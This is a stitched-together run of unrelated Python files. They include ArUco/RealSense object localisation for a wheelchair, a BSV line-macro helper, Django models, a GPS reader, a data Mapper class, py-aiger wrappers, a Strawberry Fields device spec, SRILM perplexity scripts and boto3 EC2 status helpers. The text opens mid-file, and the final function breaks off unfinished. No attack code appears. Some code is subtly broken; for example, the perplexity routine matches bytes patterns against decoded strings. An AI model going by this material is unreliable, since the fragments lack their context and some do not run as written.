compute",axis,theta) class obj(): def __init__(self,num1,num2,num3): self.aruco_num1 = num1 self.aruco_num2 = num2 self.aruco_num3 = num3 self.in_camera = False self.xyz1 = None self.xyz2 = None self.xyz3 = None def obj_dec(self,ids,corners,depth_img): for id in range(len(ids)): if ids[id] == self.aruco_num1: self.xyz1 = get_xyz(corners[id], depth_img) self.in_camera = True #print("obj",self.aruco_num,"xyz=",self.xyz) if ids[id] == self.aruco_num2: self.xyz2 = get_xyz(corners[id], depth_img) if ids[id] == self.aruco_num3: self.xyz3 = get_xyz(corners[id], depth_img) #self.in_camera = True #print("obj",self.aruco_num,"xyz=",self.xyz) def compute_obj2wheelchair_base(self,wheelchair): w_Q1 = np.asarray(wheelchair.num_xyz['num1']) w_Q2 = np.asarray(wheelchair.num_xyz['num2']) o_Q1 = np.asarray(self.xyz1) o_Q2 = np.asarray(self.xyz2) #print(w_Q1,"\n",w_Q2,"\n",o_Q1,"\n",o_Q2) axis_x_c = unit_vector( w_Q2 - w_Q1 ) axis_z_c = unit_vector( o_Q2 - o_Q1 ) axis_y_c = np.cross(axis_x_c, axis_z_c) #print("axis",axis_x_c, axis_y_c, axis_z_c) RT = np.array([axis_x_c, axis_y_c, axis_z_c]) RT = np.asmatrix(RT) RT_i = np.linalg.inv(RT) o2w = o_Q2 - w_Q2 o2w = o2w.dot(RT_i) #print(RT) #print(o2w) o_Q3 = np.asarray(self.xyz3) axis_x_o = unit_vector( o_Q2 - o_Q3 ) axis_z_o = unit_vector( o_Q2 - o_Q1 ) axis_y_o = np.cross(axis_x_o, axis_z_o) RT_o = np.array([axis_x_o, axis_y_o, axis_z_o]) RT_o = np.asmatrix(RT_o) RT_o_i = np.linalg.inv(RT_o) o_axis = o_Q3.dot(RT_o_i) #print(o_axis) #print("MOVE",o_axis[0,1]) o_axis[0,1] = o_axis[0,1] + 0.2 obj_c = o_axis.dot(RT_o) obj_w = obj_c - w_Q2 obj2w = obj_w.dot(RT_i) + diff_w print(obj2w) return obj2w # print(self.xyz,wheelchair.num_xyz['num2']) # dis_obj2wheelchairnum2 =np.asarray(self.xyz - wheelchair.num_xyz['num2']) # axis_y_wheelchair_camera =np.asarray(wheelchair.num_xyz['num2'] - wheelchair.num_xyz['num1']) # print("dis_obj2wheelchairnum2 = ",dis_obj2wheelchairnum2) # print("axis_wheelchair_camera = ",axis_y_wheelchair_camera) # A = np.asarray([1, 0, 0]) # B = axis_y_wheelchair_camera # print("A = ",A,"B = ",B) # axis = np.cross(A,B) # theta = angle_between(A,B) # print(theta) # rotation_matrix(axis, theta) # M0 = M(axis, theta) # print("obj2wheelchair",dis_obj2wheelchairnum2.dot(M0)) #wheelchair2obj = np.dot(Rv, dis_obj2wheelchairnum2) #print(wheelchair2obj) def get_xyz(conner,depth_img): camera_cx = 340.745 camera_cy = 245.132 camera_fx = 615.376 camera_fy = 614.775 conner_p = conner[0] n,m = int(np.mean(conner_p[:,0])),int(np.mean(conner_p[:,1])) z = depth_img[m,n]/1000.0 x = (n - camera_cx) * z / camera_fx y = (m - camera_cy) * z / camera_fy return np.array([x,y,z]) def aruco_init(): global pipe, find_wheel_chair cap = cv2.VideoCapture(0) pipe = rs.pipeline() config = rs.config() config.enable_stream(rs.stream.color, 640, 480, rs.format.rgb8, 30) 
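# --- A minimal, self-contained sketch of the pinhole back-projection used by
# get_xyz() above: a pixel (u, v) plus a depth value in millimetres is mapped
# to camera-frame XYZ in metres. The intrinsics are the values hard-coded in
# get_xyz(); the synthetic depth image below is purely illustrative.
import numpy as np

def pixel_to_camera_xyz(u, v, depth_mm, fx=615.376, fy=614.775, cx=340.745, cy=245.132):
    """Back-project one pixel with known depth into camera coordinates."""
    z = depth_mm / 1000.0              # RealSense depth frames are in millimetres
    x = (u - cx) * z / fx
    y = (v - cy) * z / fy
    return np.array([x, y, z])

if __name__ == '__main__':
    # Fake a 480x640 depth image that reads 1.5 m everywhere and back-project a
    # pixel near the optical centre: the result is approximately (0, 0, 1.5).
    depth_img = np.full((480, 640), 1500, dtype=np.uint16)
    u, v = 340, 245
    print(pixel_to_camera_xyz(u, v, depth_img[v, u]))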
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30) profile = pipe.start(config) find_wheel_chair = 0 def process_data(ids,rotation_mat): global send_data for i in range(3): for j in range(3): index = 10+ids*9+i*3+j #send_data.double6dArr[index] = rotation_mat[i,j] #send_data.double6dArr[10]=rotation_mat(0, 1) def aruco_fun_compute(): global pipe axis = np.float32([[3,0,0], [0,3,0], [0,0,-3]]).reshape(-1,3) frames = pipe.wait_for_frames() align_to = rs.stream.color align = rs.align(align_to) aligned_frames = align.process(frames) depth_frame = aligned_frames.get_depth_frame() color_frame = aligned_frames.get_color_frame() color_img = np.array(color_frame.get_data()) color_img_temp = copy.deepcopy(color_img) depth_img = np.array(depth_frame.get_data()) frame = color_img_temp gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250) parameters = aruco.DetectorParameters_create() corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters) wheelchair = Wheelchair() obj1 = obj(5,6,11) if ids is not None and len(ids) > 0: wheelchair.wheelchair_dec(ids,corners,depth_img) obj1.obj_dec(ids,corners,depth_img) if wheelchair.in_camera and obj1.in_camera: print("let us see the distance in camera") pipe.stop() return obj1.compute_obj2wheelchair_base(wheelchair) pipe.stop() return [0.0,0.0,0.0] def aruco_fun(): global pipe axis = np.float32([[3,0,0], [0,3,0], [0,0,-3]]).reshape(-1,3) frames = pipe.wait_for_frames() align_to = rs.stream.color align = rs.align(align_to) aligned_frames = align.process(frames) depth_frame = aligned_frames.get_depth_frame() color_frame = aligned_frames.get_color_frame() color_img = np.array(color_frame.get_data()) color_img_temp = copy.deepcopy(color_img) depth_img = np.array(depth_frame.get_data()) frame = color_img_temp gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250) parameters = aruco.DetectorParameters_create() corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters) wheelchair = Wheelchair() obj1 = obj(5,6,11) if ids is not None and len(ids) > 0: wheelchair.wheelchair_dec(ids,corners,depth_img) obj1.obj_dec(ids,corners,depth_img) # global wheel_chair_translation_vectors, find_wheel_chair # num = int(len(ids)) # for id_obj in range(num): # if ids[id_obj] == 6: # find_wheel_chair = 1 # wheel_chair_translation_vectors = get_xyz(corners[id_obj], depth_img) # elif ids[id_obj]!=6: # if find_wheel_chair == 0: # continue # obj_translation_vectors = get_xyz(corners[id_obj], depth_img) # p = obj_translation_vectors - wheel_chair_translation_vectors # print(ids[id_obj]," ","postion vetor is",p) # #process_data(ids[id_obj],p) if wheelchair.in_camera and obj1.in_camera: print("let us see the distance in camera") obj1.compute_obj2wheelchair_base(wheelchair) gray = aruco.drawDetectedMarkers(gray, corners) cv2.imshow('frame',gray) if cv2.waitKey(1) & 0xFF == ord('q'): cv2.destroyAllWindows() #break def get_obj2w(): aruco_init() obj2w = aruco_fun_compute() return obj2w #if __name__ =='__main__': #main()import inspect def add_line_macro(bsv_code, file_name = None, line_number = None): """ Appends line macro to the provided bsv_code to get accurate BSC error messages. If file name or line number are not provided, this function assumes the text of bsv_code was written in this function call without line breaks between the parenthesis of the function call and bsv_code string. 
When using this function, if you get a compilation error in BSC, the file name and line number will point to the file name and line number in the python script containing Good example: >> bsv_code = add_line_macro(''' module mkTest(Empty); Reg#(Bit#(32)) x <- mkReg(0); endmodule ''') Bad example: >> bsv_code = 'function Bool inv(Bool x) = !x;' >> bsv_code = add_line_macro(bsv_code) """ frame = inspect.stack()[1][0] try: if not file_name: file_name = inspect.getframeinfo(frame).filename if not line_number: line_number = inspect.getframeinfo(frame).lineno - bsv_code.count('\n') finally: del frame return ('`line %d "%s" 0\n' % (line_number, file_name)) + bsv_code from finq import FINQ def test_flat_map_list_of_lists_to_list(): a = [[1, 2, 5], [7, 12], [15, 22, 26]] expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected def test_flat_map_list_of_tuples_to_list(): a = [(1, 2, 5), (7, 12), (15, 22, 26)] expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected def test_flat_map_tuple_of_list_to_list(): a = ([1, 2, 5], [7, 12], [15, 22, 26]) expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected def test_flat_map_set_of_list_to_list(): a = {(1, 2, 5), (7, 12), (15, 22, 26)} expected = [1, 2, 5, 7, 12, 15, 22, 26] a_f = FINQ(a) assert a_f.flat_map().to_list() == expected # the order of imports is important here. "view" uses "main" # so "main" must be imported before "views". from ..blueprint import main # noqa: F401 from . import views # noqa: F401 #!/usr/bin/env python3 def get_input() -> list: with open('./input', 'r') as f: return [v.strip() for v in f.readlines()] lines = get_input() items = [dict()] for line in lines: if line == '': items.append(dict()) else: for tok in line.split(' '): k, v = tok.split(':') items[-1].update({k: v}) valid_count = 0 for it in items: valid = True for required_value in ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']: if not required_value in it: valid = False break if valid: valid_count += 1 print(valid_count) kvderevyanko/price #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2015-2019 <> """Library and util for uploading files to NodeMCU version 0.9.4 and later""" from .version import __version__ # noqa: F401 from .uploader import Uploader # noqa: F401 jimforit/lagou from django.db import models from db.base_model import BaseModel from django.contrib.auth.models import AbstractUser # Create your models here. 
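# --- add_line_macro() above recovers the *caller's* file name and line number
# via the inspect module so that generated BSV code can carry a `line directive
# pointing back at the Python source. The sketch below isolates just that
# frame-inspection step; the helper name caller_location() is illustrative and
# not part of the original module.
import inspect

def caller_location():
    """Return (filename, lineno) of the code that called this function."""
    frame = inspect.stack()[1][0]
    try:
        info = inspect.getframeinfo(frame)
        return info.filename, info.lineno
    finally:
        # Break the reference cycle frame objects can create, for the same
        # reason the original deletes its frame in a finally block.
        del frame

if __name__ == '__main__':
    filename, lineno = caller_location()
    print('called from %s:%d' % (filename, lineno))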
class Role(BaseModel): role_choices = ( ('user', '求职者'), ('recruiter', '招聘人') ) id = models.AutoField('角色ID',primary_key=True) name = models.CharField('角色名',choices=role_choices,max_length=10) class Meta: verbose_name = '角色' verbose_name_plural = verbose_name def __str__(self): return self.name class User(AbstractUser,BaseModel): gender_choices = ( ('male', '男'), ('female', '女') ) id = models.AutoField('用户ID',primary_key=True) nick_name = models.CharField('昵称', max_length=50, default='') password = models.CharField('密码',max_length=20) gender = models.CharField('性别', max_length=10, choices=gender_choices, default='female') email = models.EmailField('电邮地址', max_length=64, default='') role = models.ForeignKey(Role, verbose_name='角色', on_delete=models.CASCADE,default=1) mobile = models.CharField('手机号', max_length=11, null=True, blank=True) image = models.ImageField(upload_to='image/%Y%m', default='/static/images/CgotOVsDfHCAC9pmAAGCQkZqi4Y202.png', max_length=100) class Meta: verbose_name = '用户信息' verbose_name_plural = verbose_name def __str__(self): return self.username import serial import pynmea2 def parseGPS(s): if s.find('GGA') > -1: msg = pynmea2.parse(s) print("Timestamp: %s -- Lat: %s %s -- Lon: %s %s -- Altitude: %s %s" % ( msg.timestamp, msg.lat, msg.lat_dir, msg.lon, msg.lon_dir, msg.altitude, msg.altitude_units)) serialPort = serial.Serial("/dev/ttyUSB0", 9600, timeout=0.5) while True: s = serialPort.readline() # print(s) # print(type(s.decode())) # print(s.find(b'GGA')) s = s.decode() parseGPS(s) JeffKwasha/hachit """ Mapper 'maps' data into a new heirarchy: A mapper from: { 'REMAP': {'out' : ('foo', 'bar', 2)} with input: {'foo' : { 'bar' : ('baz', 5, 'buzz') } } will output: {'out' : 'buzz' } More formally: Mapper is built from a dictionary; mapper = Mapper( {...} ) Mapper is called on some data; newData = mapper(data) Mapper REMAPs its input, evaluates its fields, and DISCARDs parts of the result. REMAP - search the input for values and assign them to the REMAP's fieldname: { K:REMAP(V, INPUT) for K,V in REMAP.items() } REMAP() does the following: if 'V' is a string or int: return INPUT[FIELD_NAME] if 'V' is a tuple, drill down: return INPUT[FIELD_NAME[0]][FIELD_NAME[1]]... if 'V' is a list, return [ REMAP(i, INPUT) for i in V] if 'V' is a dict, recurse return {k:REMAP(v, INPUT) for k,v in V.items()} if 'V' is a function, return V(INPUT) 'fields' - anything in mapper's top level other than 'REMAP', 'DISCARD', 'INDEX', or 'TYPES' is a field Fields are simply evaluated and assigned, and they 'update' the value built by REMAP DISCARD - search the value and discard anything found. (performed last) typically a list of keys or indexes to delete, Unnecessary if REMAP is used (Why REMAP only to later discard) """ # a class to execute mappings over data from copy import deepcopy import logging from utils import eval_field #TODO lambda data: {k,v for k,v in data if len(k) > 5} #TODO lambda data: ((a,b) for a,b in data if 'foo' in a) logger = logging.getLogger(__name__) from pprint import pformat class Mapper: """ Mapper is the universal converter between data structures. NOTE! Mapper doesn't make clean copies. It will wreck your input and the input and output will be linked. Mapper( { 'REMAP' : {...}, 'DISCARD' : [...], 'etc' : 'foo' } ) works like a dictionary: mapper_instance['out_field'] = 'foo string' works like a function: out_data = mapper_instance(data_in) chops up and rebuilds input data based on 'REMAP', 'DISCARD', 'dictionary fields'... 
REMAP : { 'key': 'value' } navigates data using value and returns {'key': data['value']} You can drill down into dictionaries lists and tuples: { 'key': ('top_dict', 'sub_dict', 3) } You can use a function to inspect the data and return a value { 'key' : lambda data: ','.join( data['list'] ) } DISCARD: throws away outputs... TODO: Mapper config should be able to refer to itself: 'outfield' = lambda v: self.config['remap']['bar'] TODO: output elastic mapping structures based on config... ? Mapper constant values override values from REMAP Mapper DISCARD is performed last (overriding everything) Mapper constant values can be iterated like a dict. Mapper constant values can be lookedup/assigned like a dict Mapper constant values can be a function to execute on the data, which means the function can alter the data at will. """ __slots__ = ('remap', 'discard', 'index', 'types', 'fields', 'invalid') def __init__(self, dic, data=None): logger.debug("Initializing {} from {}".format(self.__class__.__name__, dic)) dic_t = type(dic) if dic_t is Mapper: raise Exception("Don't initialize a mapper with a mapper") if dic_t is dict: self.remap = dic.pop('REMAP', None) # fields you want to rename or rearrange self.discard = dic.pop('DISCARD', None)# fields you don't want self.index = dic.pop('INDEX', None) # index is reserved for future elasticsearch magicality self.types = dic.pop('TYPES', None) # types is reserved for future elasticsearch magicality self.invalid = dic.pop('INVALID', None) # invalid defines REMAP's default invalid value. self.fields = dic # fields are simply assigned values ie: return value(data) if callable(value) else value. elif dic_t in (str, int, float): self.fields = dic if data: self.fields = self(data) @staticmethod def _discards(discards, data): if not discards: return #logger.error('del {} on {}'.format(pformat(discards,), pformat(data))) d_t = type(discards) if d_t in (int, str): try: del data[discards] except IndexError: pass except KeyError: pass except TypeError: pass return elif d_t is tuple: # Drill down if len(discards) > 1: Mapper._discards(discards[1:], data[discards[0]]) else: Mapper._discards(discards[0], data) return # if discards is not a tuple, but is iterable, just delete the whole list (or dictionary keys or ...) for li in discards: Mapper._discards(li, data) return def __call__(self, data): """ frankinstate output from data-parts. this makes Mapper 'callable' so a Mapper is a valid field value in defining a Mapper. Not sure how you could, but Don't make cycles. 
""" logger.debug("mapper: {} data: {}".format(self.remap, data)) from utils import search # remap the input data (effectively deleting anything not listed) if self.remap: rv = search(self.remap, data, invalid=self.invalid) elif self.discard and isinstance(data, dict): rv = deepcopy(data) else: rv = {} # add the static fields if self.fields: eval_field(rv, self.fields, rv or data) # delete any discards self._discards(self.discard, rv) return rv def __getitem__(self, key): return self.fields.__getitem__(key) def __setitem__(self, key, val): return self.fields.__setitem__(key, val) def __iter__(self): return self.fields.__iter__() def __next__(self): return self.fields.__next__() def _test(): data= { 'DISCARD' : 'hash', 'REMAP': { 'hash' : lambda v: v[0], 'name' : lambda v: v[1], 'date.created' : lambda v: v[2], 'comment' : lambda v: v[3], }, 'key': 'value', } try: m = Mapper(data) return m(['a','b','c','d']) == {'name':'b', 'date.created':'c', 'comment':'d', 'key':'value'} except: return False 0 from lib.dataset.imdb import IMDB from lib.dataset.pascal_voc import PascalVOC from lib.dataset.nuclei_data import NucleiDataset from lib.dataset.pascal_voc_segmentation import PascalVOC_Segmentation from lib.dataset.cityscape_segmentation import CityScape_Segmentation from lib.dataset.coco import coco redax/predicates/aiger.py1-10 import funcy as fn import aiger from aiger_analysis.bdd import from_bdd, to_bdd try: from dd.cudd import BDD except ImportError: try: from dd.autoref import BDD except ImportError: raise ImportError( "Cannot import dd.cudd or dd.autoref." + "Reinstall with BDD support." ) aa = None bddmgr = BDD() to_bdd = fn.partial(to_bdd, manager=bddmgr) from_bdd = fn.partial(from_bdd, manager=bddmgr) class AAG(): """ Wrapper around py-aiger's BoolExpr class. Used to support an interface that's analogous to dd. """ def __init__(self, aag): self.aag = aag @property def support(self): return self.aag.inputs def __invert__(self): return AAG(~self.aag) def __or__(self, other): return AAG(self.aag | other.aag) def __and__(self, other): return AAG(self.aag & other.aag) def __eq__(self, other): # return aa.is_equal(self.aag, other.aag) # sat-based interface ### BDD based interface for now bdd, _, vartable = to_bdd(self.aag) bddmgr.declare(*vartable.inv.values()) bdd = bddmgr.let(vartable.inv, bdd) return to_bdd(self.aag)[0] == to_bdd(other.aag)[0] def __iand__(self, other): return AAG(self.aag & other.aag) def __ior__(self, other): return AAG(self.aag | other.aag) class aigerwrapper(object): """ Wrapper around py-aiger. Mimics the interface of dd. 
""" def __init__(self): pass def declare(self, name: str): pass def var(self, name: str): return AAG(aiger.atom(name)) def exist(self, vars, pred): # return AAG(aa.eliminate(aag, vars)) aagbdd, _, vartable = to_bdd(pred.aag) bddmgr.declare(*vartable.inv.values()) aagbdd = bddmgr.let(vartable.inv, aagbdd) return AAG(from_bdd( bddmgr.exist(vars, aagbdd) )) def forall(self, vars, pred): # return AAG(~aa.eliminate(~aag, vars)) aagbdd, _, vartable = to_bdd(pred.aag) bddmgr.declare(*vartable.inv.values()) aagbdd = bddmgr.let(vartable.inv, aagbdd) return AAG(from_bdd( bddmgr.forall(vars, aagbdd))) @property def true(self): return AAG(aiger.atom(True)) @property def false(self): return AAG(aiger.atom(False)) def count(self, aag, bits): raise NotImplementedError def pick_iter(self, aag): raise NotImplementedError """ Copyright (C) 2020 () This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import asyncio import datetime from unittest import TestCase from mock import patch import blmcontrol.animations import blmcontrol.blmcontrol import blmcontrol.earth_data.earth_data class TestAnimationOrder(TestCase): @patch('blmcontrol.earth_data.earth_data.current_time') def test_animation_start(self, current_time_mock): """ Check if animation starts on time """ current_time_mock.return_value = datetime.datetime.now().replace(hour=12) self.assertTrue(blmcontrol.earth_data.earth_data.lights_out()) current_time_mock.return_value = datetime.datetime.now().replace(hour=8) self.assertFalse(blmcontrol.earth_data.earth_data.lights_out(hard_off='10:30')) @patch('blmcontrol.earth_data.earth_data.current_time') def test_animation_select(self, current_time_mock): """ Check if animation starts correct one """ blmcontrol.animations.TIMES = 1 current_time_mock.return_value = datetime.datetime.now().replace(hour=10, minute=0) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == [1]) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == []) current_time_mock.return_value = datetime.datetime.now().replace(hour=10, minute=15) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == [2]) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertTrue(blmcontrol.blmcontrol.QUEUE['animations'] == []) current_time_mock.return_value = datetime.datetime.now().replace(hour=12) asyncio.run(blmcontrol.blmcontrol.animation_control(-120, '10:30', 10, 10)) self.assertEqual(blmcontrol.blmcontrol.CURRENT_DISPLAY, 0) sylviemonet/strawberryfields # Copyright 2020 Xanadu Quantum Technologies Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This module contains a class that represents the specifications of a device available via the API. """ from collections.abc import Sequence import re import blackbird from blackbird.error import BlackbirdSyntaxError import strawberryfields as sf from strawberryfields.compilers import Ranges from strawberryfields.tdm.tdmprogram import TDMProgram class DeviceSpec: """The specifications for a specific hardware device. Args: target (str): name of the target hardware device spec (dict): dictionary representing the raw device specification. This dictionary should contain the following key-value pairs: - layout (str): string containing the Blackbird circuit layout - modes (int): number of modes supported by the target - compiler (list): list of supported compilers - gate_parameters (dict): parameters for the circuit gates connection (strawberryfields.api.Connection): connection over which the job is managed """ def __init__(self, target, spec, connection): self._target = target self._connection = connection self._spec = spec @property def target(self): """str: The name of the target hardware device.""" return self._target @property def layout(self): """str: Returns a string containing the Blackbird circuit layout.""" return self._spec["layout"] @property def modes(self): """int: Number of modes supported by the device.""" return self._spec["modes"] @property def compiler(self): """list[str]: A list of strings corresponding to Strawberry Fields compilers supported by the hardware device.""" return self._spec["compiler"] @property def default_compiler(self): """sf.compilers.Compiler: Specified default compiler""" if self.compiler: return self.compiler[0] # For now, use Xunitary compiler by default for devices # if the default compiler is not specified. return "Xunitary" @property def gate_parameters(self): """dict[str, strawberryfields.compilers.Ranges]: A dictionary of gate parameters and allowed ranges. The parameter names correspond to those present in the Blackbird circuit layout. **Example** >>> spec.gate_parameters {'squeezing_amplitude_0': x=0, x=1, 'phase_0': x=0, 0≤x≤6.283185307179586} """ gate_parameters = {} for gate_name, param_ranges in self._spec["gate_parameters"].items(): # convert gate parameter allowed ranges to Range objects range_list = [[i] if not isinstance(i, Sequence) else i for i in param_ranges] gate_parameters[gate_name] = Ranges(*range_list) return gate_parameters def layout_is_formatted(self): """bool: Whether the device layout is formatted or not.""" p = re.compile(r"{{\w*}}") return not bool(p.search(self.layout)) def fill_template(self, program): """Fill template with parameter values from a program""" if self.layout_is_formatted(): return if isinstance(program, TDMProgram): self._spec["layout"] = self._spec["layout"].format( target=self.target, tm=program.timebins ) else: # TODO: update when `self._spec["layout"]` is returned as an unformatted string raise NotImplementedError("Formatting not required or supported for non-TDM programs.") def validate_parameters(self, **parameters): """Validate gate parameters against the device spec. 
Gate parameters should be passed as keyword arguments, with names corresponding to those present in the Blackbird circuit layout. """ # check that all provided parameters are valid for p, v in parameters.items(): if p in self.gate_parameters and v not in self.gate_parameters[p]: # parameter is present in the device specifications # but the user has provided an invalid value raise ValueError( f"{p} has invalid value {v}. Only {self.gate_parameters[p]} allowed." ) if p not in self.gate_parameters: raise ValueError(f"Parameter {p} not a valid parameter for this device") def create_program(self, **parameters): """Create a Strawberry Fields program matching the low-level layout of the device. Gate arguments should be passed as keyword arguments, with names correspond to those present in the Blackbird circuit layout. Parameters not present will be assumed to have a value of 0. **Example** Device specifications can be retrieved from the API by using the :class:`~.Connection` class: >>> spec.create_program(squeezing_amplitude_0=0.43) Keyword Args: Supported parameter values for the specific device Returns: strawberryfields.program.Program: program compiled to the device """ try: bb = blackbird.loads(self.layout) except BlackbirdSyntaxError as e: raise BlackbirdSyntaxError("Layout is not formatted correctly.") from e self.validate_parameters(**parameters) # determine parameter value if not provided extra_params = set(self.gate_parameters) - set(parameters) for p in extra_params: # Set parameter value as the first allowed # value in the gate parameters dictionary. parameters[p] = self.gate_parameters[p].ranges[0].x # evaluate the blackbird template bb = bb(**parameters) prog = sf.io.to_program(bb) prog._compile_info = (self, self.default_compiler) return prog def refresh(self): """Refreshes the device specifications""" self._spec = self._connection._get_device_dict(self.target) sonvt1710/manga-py #!/usr/bin/python3 # -*- coding: utf-8 -*- import unittest from os import path from manga_py import fs from tests import * root_path = path.join(path.dirname(path.realpath(__file__)), 'tests') if __name__ == '__main__': fs.make_dirs(root_path + '/temp') unittest.main() #!/usr/bin/python3 # -*- coding: utf-8 -*- # # Routines for language model estimation and perplexity computation. 
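# --- DeviceSpec above decides whether its Blackbird layout still needs
# formatting by searching for unfilled placeholders before calling .format().
# This is a dependency-free sketch of that check-then-fill pattern only: the
# layout text and parameter names are made up, and single-brace placeholders
# are used here so that str.format can fill them directly (the original checks
# a slightly different, double-braced placeholder convention).
import re

PLACEHOLDER = re.compile(r"\{\w+\}")

def is_formatted(layout: str) -> bool:
    """True once no placeholders remain in the layout string."""
    return not bool(PLACEHOLDER.search(layout))

def fill_layout(layout: str, **params) -> str:
    """Fill the layout only if it still contains placeholders."""
    if is_formatted(layout):
        return layout
    return layout.format(**params)

if __name__ == '__main__':
    layout = "name template_demo\nversion 1.0\ntarget demo (shots={shots})"
    assert not is_formatted(layout)
    filled = fill_layout(layout, shots=100)
    assert is_formatted(filled)
    print(filled)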
# # Author: # http://users.marjaniemi.com/seppo/ import sys import re import tempfile import subprocess def read_word_segmentations(input_file): wsegs = dict() for line in input_file: line = line.strip() if line.startswith('#'): continue line = re.sub('\d*', '', line) parts = line.split(r'+') if len(parts) < 2: parts = line.split(' ') parts = [re.sub(' ', '', x) for x in parts] wrd = '' for part in parts: wrd += part wsegs[wrd] = parts return wsegs def word_perplexity(train_text, devel_text, vocabulary=None): lm_file = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") command = [ 'ngram-count', '-order', '2', '-wbdiscount1', '-wbdiscount2', '-interpolate1', '-interpolate2', '-text', train_text, '-lm', lm_file.name ] if vocabulary is not None: command.extend(['-unk', '-vocab', vocabulary]) subprocess.check_call(command) command = [ 'ngram', '-order', '2', '-lm', lm_file.name, '-ppl', devel_text] if vocabulary is not None: command.extend(['-unk', '-vocab', vocabulary]) output = subprocess.check_output(command).decode('utf-8').splitlines() matches = re.search(b'(\d+) OOVs', output[0]) if matches: num_oovs = int(matches.group(1)) else: sys.stderr.write("Unable to parse OOVs from:\n") sys.stderr.write(output[0]) sys.stderr.write("\n") sys.exit(1) matches = re.search(b'ppl= ?(\d+(.\d+)?)', output[1]) if matches: perplexity = float(matches.group(1)) else: sys.stderr.write("Unable to parse ppl from:\n") sys.stderr.write(output[1]) sys.stderr.write("\n") sys.exit(1) return perplexity, num_oovs # Segments text according to given word segmentation, to be used as subword # language model training data. def segment_text(input_file, output_file, wsegs): for line in input_file: line = line.strip() words = line.split() output_file.write(" ") for word in words: subwords = wsegs[word] for sw in subwords: output_file.write(sw) output_file.write(" ") output_file.write(" ") output_file.write("\n") def subword_perplexity(train_text, devel_text, wsegs, order=3): if wsegs is None: segmented_train_text = train_text segmented_devel_text = devel_text else: segmented_train_text = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") segment_text(train_text, segmented_train_text, wsegs) segmented_devel_text = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") segment_text(devel_text, segmented_devel_text, wsegs) lm_file = tempfile.NamedTemporaryFile(mode='w+', encoding="utf-8") command = [ 'ngram-count', '-order', str(order), '-wbdiscount1', '-wbdiscount2', '-wbdiscount3', '-interpolate1', '-interpolate2', '-interpolate3', '-text', segmented_train_text.name, '-lm', lm_file.name ] subprocess.check_call(command) command = [ 'perplexity', '-a', lm_file.name, '-t', '2', segmented_devel_text.name, '-'] output = subprocess.check_output(command, stderr=subprocess.STDOUT).decode('utf-8') matches = re.search('^Dropped:\s*(\d+) UNKS', output, re.MULTILINE) if matches: num_oovs = int(matches.group(1)) else: sys.stderr.write("Unable to parse UNKS from:\n") sys.stderr.write(output) sys.exit(1) matches = re.search('^Perplexity (\d+(.\d+)?)', output, re.MULTILINE) if matches: perplexity = float(matches.group(1)) else: sys.stderr.write("Unable to parse Perplexity from:\n") sys.stderr.write(output) sys.exit(1) return perplexity, num_oovs import boto3 import os import requests from settings import DEFAULT_REGION, KEYNAME session = boto3.session.Session(region_name=DEFAULT_REGION, profile_name=KEYNAME) def get_public_ip(instance_ids): ec2_client = session.client("ec2") reservations = 
ec2_client.describe_instances(InstanceIds=instance_ids).get( "Reservations" ) for reservation in reservations: for instance in reservation["Instances"]: return instance.get("PublicIpAddress") def get_running_instances(): ec2_client = session.client("ec2") reservations = ec2_client.describe_instances( Filters=[{"Name": "instance-state-name", "Values": ["running"],}] ).get("Reservations") instances = [] for reservation in reservations: for instance in reservation["Instances"]: instance_id = instance["InstanceId"] instance_type = instance["InstanceType"] public_ip = instance["PublicIpAddress"] private_ip = instance["PrivateIpAddress"] instances.append( f"{instance_id}, {instance_type}, {public_ip}, {private_ip}" ) return instances def get_instance_status(instance_id): ec2_client = session.client("ec2") if instance_id: reservations = ec2_client.describe_instances(InstanceIds=[instance_id]).get( "Reservations" ) else: reservations = ec2_client.describe_instances().get("Reservations") instances_status = [] for reservation in reservations: for instance in reservation["Instances"]: instance_id = instance["InstanceId"] instance_type = instance["InstanceType"] instance_status = instance["State"]["Name"] public_dns_name = instance["PublicDnsName"] link_details = "Server is spinning up" if instance_status == "running": link_details = "Server is up and docker is spinning up right now" try: response = requests.get(f"http://{public_dns_name}") if response.status_code == 200: link_details = f"The site is up and running. please visit http://{public_dns_name}" except: link_details = "Server is up and docker is spinning up right now" elif instance_status == "terminated": link_details = "Server is terminated" elif instance_status == "shutting-down": link_details = "Server is shutting down" else: link_details = "" instances_status.append( 